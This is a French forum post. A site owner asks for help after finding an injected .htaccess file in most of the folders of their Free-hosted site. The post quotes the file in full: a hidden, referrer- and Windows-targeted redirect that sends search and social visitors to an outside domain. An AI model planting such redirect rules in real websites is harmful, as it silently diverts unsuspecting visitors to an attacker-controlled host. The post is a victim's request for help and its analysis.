Cocodu670 | Bonjour,
je tiens un site web hébergé par Free sur les pages perso.
Depuis une semaine je pense m'être fait "hacké" deux fois. Je vous explique la situation :
Je retrouve dans presque tous mes dossier un .htaccess qui contient le code suivant :
Code :
- #
- # DO NOT EDIT THIS FILE
- ErrorDocument 500 http://dns.thesoulfoodcafe.com/mai [...] ZHyJEZ&e=0
- ErrorDocument 502 http://dns.thesoulfoodcafe.com/mai [...] ZHyJEZ&e=2
- ErrorDocument 403 http://dns.thesoulfoodcafe.com/mai [...] ZHyJEZ&e=3
- RewriteEngine On
- RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*blogger.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*qq\.com.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*doubleclick.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*livejournal.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
- RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]
- RewriteCond %{HTTP_USER_AGENT} .*Windows.*
- RewriteRule .* http://dns.thesoulfoodcafe.com/mai [...] j9U8ZHyJEZ [R,L]
- RewriteCond %{REQUEST_FILENAME} !-f
- RewriteCond %{REQUEST_FILENAME} !-d
- RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
- RewriteCond %{HTTP_USER_AGENT} .*Windows.*
- RewriteRule .* http://dns.thesoulfoodcafe.com/mai [...] j9U8ZHyJEZ [R,L]
|
Un espace important est laissé entre le texte "DO NOT EDIT THIS FILE" et le code qui suit. Ce code est donc clairement mailveillant.
Alors deux questions : - que fait ce programme à part désactiver l'accès de mon site aux visiteurs ?
- d'où viens la faille ? En effet, j'enregistre sur base de données toutes les pages qui sont chargée et je ne constate aucune activité suspecte.
Note : l'accès de mon site est normalement protégé par mot de passe (.htaccess). Je dois donc le refaire à chaque fois puisqu'il est écrasé.
Voilà, si vous avez des idées et des suggestions je suis à votre écoute. Merci de m'aider.
Merci,
Corentin |